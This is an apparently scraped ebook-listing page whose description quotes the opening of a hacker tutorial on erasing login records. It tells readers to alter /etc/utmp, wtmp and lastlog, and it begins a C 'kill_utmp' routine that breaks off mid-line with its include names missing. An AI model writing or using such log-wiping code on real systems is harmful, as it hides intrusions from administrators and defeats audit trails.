Search in ebookee.com.cn!

Erasing_Your_Presence_From_System_Logs


<< Buy This Book on Amazon >>


收藏推荐: Bookmark this: Erasing_Your_Presence_From_System_Logs

图书介绍


い Erasing Your Presence From System Logs い



Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.



Example:



#include

#include

#include

#include

#include

#include

#include

#include

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"



int f;



void kill_utmp(who)

char *who;

{

    struct utmp utmp_ent;



  if ((f=open(UTMP_NAME,O_RDWR))>=0) {

        while(read (f,


Copyright Disclaimer:
本站一切内容源于互联网搜索,禁止商用!请查看 本页来源页面 的版权声明。 如有任何不妥请联系:ebookee[at]gmail.com,我们将在24小时内删除相关内容。

浏览量:101 添加时间:2007-05-18 02:18:57, 更新时间:2007-05-27 05:03:00, from internet

下载链接


<< Buy This Book on Amazon >>

没有下载链接
请在图书介绍里查找下载链接,如果没有,可以试着搜索有无其它该书信息。

不能下载?
如果不能下载或者在“图书介绍”中找不到 "Erasing_Your_Presence_From_System_Logs" 的下载链接请留言。下次访问本站时察看 所有留言 看是否有人已经更新了该书。

该书可能有其它下载链接,请点 这里 查询相关图书。


相关链接


"Erasing_Your_Presence_From_System_Logs" 相关链接:


搜索该书!...


搜索 "Erasing_Your_Presence_From_System_Logs"...

Search in ebookee.com!

Comments


"Erasing_Your_Presence_From_System_Logs" 没有评论.

    Leave a Comment

    如果没有下载链接或者下载链接无效,请查看相关链接或者搜索相关资料。

    required

    required

    email addresses

    required


    Back to Top